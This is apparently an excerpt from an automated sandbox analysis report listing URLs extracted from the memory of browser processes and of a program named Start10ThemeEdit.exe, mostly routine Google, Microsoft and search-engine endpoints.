Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000008.00000003.2512833563.000031B802690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result1
Source: chrome.exe, 00000008.00000002.2610454142.000031B8032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2d
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000008.00000002.2610583629.000031B803330000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609281781.000031B80308C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/r
Source: chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000008.00000002.2605981979.000031B802B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605223808.000031B802A18000.00000004.00000800.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: is-UGTIU.tmp.3.dr	String found in binary or memory: https://github.com/dotnet/wpf
Source: is-UGTIU.tmp.3.dr	String found in binary or memory: https://github.com/dotnet/wpf4
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: msedge.exe, 0000000C.00000002.2667063309.0000575002594000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000008.00000002.2603973087.000031B8028B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 0000000C.00000003.2640998723.000057500257C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000008.00000002.2616224753.000055E000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000008.00000002.2618031515.000055E000904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2543590496.000031B803F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542299891.000031B803F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2543664833.000031B803F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2616224753.000055E000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000008.00000003.2543590496.000031B803F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2543664833.000031B803F3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard1
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000008.00000002.2616224753.000055E000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardU
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000008.00000002.2618031515.000055E000904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000008.00000002.2618031515.000055E000904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2542299891.000031B803F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000008.00000002.2602377397.000031B80260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000008.00000003.2521643067.000031B80335C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521765794.000031B80340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000008.00000003.2521643067.000031B80335C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521765794.000031B80340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000008.00000003.2508121731.000055E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000008.00000003.2509120258.000055E00087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521765794.000031B80340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2617946696.000055E0008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000008.00000003.2508250276.000055E000728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000008.00000002.2618194795.000055E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: chrome.exe, 00000008.00000002.2617946696.000055E0008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/0
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000008.00000002.2602377397.000031B80260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607335105.000031B802E14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp1
Source: chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2600464297.000031B802310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610964902.000031B8034F5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default0?e
Source: chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultu
Source: msedge.exe, 0000000C.00000002.2667063309.0000575002594000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 0000000C.00000002.2667063309.0000575002594000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000008.00000002.2603055730.000031B802738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605830221.000031B802AF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000008.00000002.2603055730.000031B802738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605830221.000031B802AF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000008.00000002.2603055730.000031B802738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605830221.000031B802AF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604039621.000031B8028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000008.00000002.2605930040.000031B802B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.goo/
Source: chrome.exe, 00000008.00000002.2600464297.000031B802310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605981979.000031B802B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 0000000C.00000002.2667063309.0000575002594000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000008.00000003.2540256315.000031B8024A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2547300070.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609558606.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2545448147.000031B80312C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609644801.000031B80313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608477372.000031B802F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000008.00000002.2605007340.000031B8029EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000008.00000002.2600222778.000031B8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609644801.000031B80313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2547300070.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609558606.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2545448147.000031B80312C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2547300070.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609558606.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2545448147.000031B80312C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609644801.000031B80313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000008.00000002.2610762205.000031B80349C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601783878.000031B8024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2547300070.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609558606.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2545448147.000031B80312C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2518423890.000031B802BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000008.00000003.2547300070.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2609558606.000031B803130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2545448147.000031B80312C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608768030.000031B802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606741657.000031B802CC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000008.00000002.2605007340.000031B8029EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 0000000C.00000003.2640407722.0000575002470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000003.2640714232.0000575002474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
